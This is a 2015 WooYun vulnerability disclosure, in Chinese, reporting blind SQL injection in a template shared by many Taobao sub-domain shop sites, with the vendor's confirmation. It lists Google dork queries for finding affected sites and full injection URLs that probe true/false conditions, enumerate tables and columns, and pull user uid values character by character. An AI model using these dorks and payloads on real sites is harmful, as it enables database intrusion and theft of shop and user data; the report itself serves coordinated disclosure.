当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094216

漏洞标题:淘宝一系列网站存在多处SQL注入(存在通用性影响数万店铺)

相关厂商:淘宝网

漏洞作者: he1renyagao

提交时间:2015-01-27 17:14

修复时间:2015-03-13 17:16

公开时间:2015-03-13 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-13: 细节向公众公开

简要描述:

淘宝某三级域名下的站点使用同一套网站模板,该模板存在SQL注入漏洞,可盲注。
PS: 感谢浩天提供帮助

详细说明:

GOOGLE 关键字:
site:taobao.com inurl:/c/list_goods.php?category_id=
site:taobao.com inurl:/theme/tejia/view/view_article.php?id=
site:taobao.com inurl:/theme/daogou/view/list_goods.php?category_id
都是存在注入点的
使用这套代码的使用量是很大的

tttt111.png


过程:
根据上次发现的注入点,认为如果存在注入不应该只有一个注入点才对 ,于是有了。。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=1)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是200 即页面正常显示 (21+and+1=1)

tt13.png


http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+1=2)+ELSE+1/(SELECT+0)+END)) 访问此连接返回的是
302 即页面跳转到错误页面 (21+and+1=2)

tt14.png


至此确定存在了SQL 注入 ,接下来就是看能不能注入出数据了 ,测试过程众发现似乎有过滤了一些东西,不能使用database()、user() 之类的。 于是想到了使用盲注来猜解。
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+*+from+$$))+ELSE+1/(SELECT+0)+END))
$$ 位置使用burp 加载table来跑 可以得到一些数据表名 user 、item 、 items 、category

t5.png


而列名,使用同样的方法
http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+exists(select+$$+from+user))+ELSE+1/(SELECT+0)+END))
可以得到user表的列名 id name description title category_id uid keyword address zip nick phone name 等列名

t7.png


却定来表名和列名,接下来就是数据来
通过 http://%domain%/theme/tejia/view/view_article.php?id=(SELECT+(CASE+WHEN+(3373=3373)+THEN+(21+and+ascii(substring(select+uid+from+user+limit+1,1),1,1)=48)+ELSE+1/(SELECT+0)+END)) 来判断第一个用户的uid的第一个数字

tt19.png


以此我们可以完整的 得出uid

tt18.png


其他列名数据类似方法。

漏洞证明:

使用的方法和上一个注入一样。

修复方案:

过滤、可能还存在其他地方类似的注入,请自查, 都是site:*.uz.taobao.com 下的域名

版权声明:转载请注明来源 he1renyagao@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-28 12:56

厂商回复:

亲,感谢您的关注和支持,该漏洞我们正在修复!

最新状态:

暂无